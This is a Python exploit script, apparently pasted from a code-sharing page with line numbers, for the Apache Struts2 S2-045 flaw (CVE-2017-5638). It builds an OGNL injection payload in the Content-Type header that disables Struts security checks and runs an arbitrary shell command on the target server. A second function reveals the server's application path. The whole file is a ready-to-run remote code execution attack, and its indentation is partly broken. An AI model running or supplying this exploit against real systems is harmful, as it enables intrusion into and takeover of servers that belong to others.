#!/usr/bin/python# -*- coding: utf-8 -*- import urllib2import requests

1. #!/usr/bin/python
2. # -*- coding: utf-8 -*-
3.  
4. import urllib2
5. import requests
6. import httplib
7.  
8. from requests.packages.urllib3.exceptions import InsecureRequestWarning
9.  
10. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
11.  
12. #uso: python script.py <url> "<command>"
13.  
14. def exploit(url, cmd):
15.     payload  = "Content-Type:%{(#_='multipart/form-data')."
16.     payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
17.     payload += "(#_memberAccess?"
18.     payload += "(#_memberAccess=#dm):"
19.     payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
20.     payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
21.     payload += "(#ognlUtil.getExcludedPackageNames().clear())."
22.     payload += "(#ognlUtil.getExcludedClasses().clear())."
23.     payload += "(#context.setMemberAccess(#dm))))."
24.     payload += "(#cmd='%s')." % cmd
25.     payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
26.     payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
27.     payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
28.     payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
29.     payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
30.     payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
31.     payload += "(#ros.flush())}"
32.  
33.     try:
34.  
35.         headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
36.         #request = urllib2.Request(url, headers=headers)
37.         request = requests.get(url, headers=headers,verify=False)
38.         #page = urllib2.urlopen(request).read()
39.  
40.     except httplib.IncompleteRead, e:
41.  
42.         request = e.partial
43.     print(request.text)
44.  
45.     return request
46.  
47. def getpath(url):
48.  
49.     payload = "Content-Type:%{(#_='multipart/form-data')."
50.     payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
51.     payload += "(#_memberAccess?"
52.     payload += "(#_memberAccess=#dm):"
53.     payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
54.     payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
55.     payload += "(#ognlUtil.getExcludedPackageNames().clear())."
56.     payload += "(#ognlUtil.getExcludedClasses().clear())."
57.     payload += "(#context.setMemberAccess(#dm))))."
58.     payload += "(#path=(@org.apache.struts2.ServletActionContext@getServletContext().getRealPath(\"/\")))."
59.     payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
60.     payload += "(@org.apache.commons.io.CopyUtils@copy(#path,#ros))."
61.     payload += "(#ros.flush())}"
62.  
63.     try:
64.  
65.         headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
66.         #request = urllib2.Request(url, headers=headers)
67.         request = requests.get(url, headers=headers,verify=False)
68.         #page = urllib2.urlopen(request).read()
69.     except httplib.IncompleteRead, e:
70.         request = e.partial
71.     print("Path App: "+ request.text)
72.  
73.  
74. if __name__ == '__main__':
75.  
76.     import sys
77.     if len(sys.argv) != 3:
78.         print("[*] struts2_S2-045.py <url> <cmd>")
79.  
80.     else:
81.  
82.         print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
83.         url = sys.argv[1]
84.     cmd = sys.argv[2]
85.         print("[*] cmd: %s" % cmd)
86.     print("[*] url: %s" % url)
87.         exploit(url, cmd)
88.     getpath(url)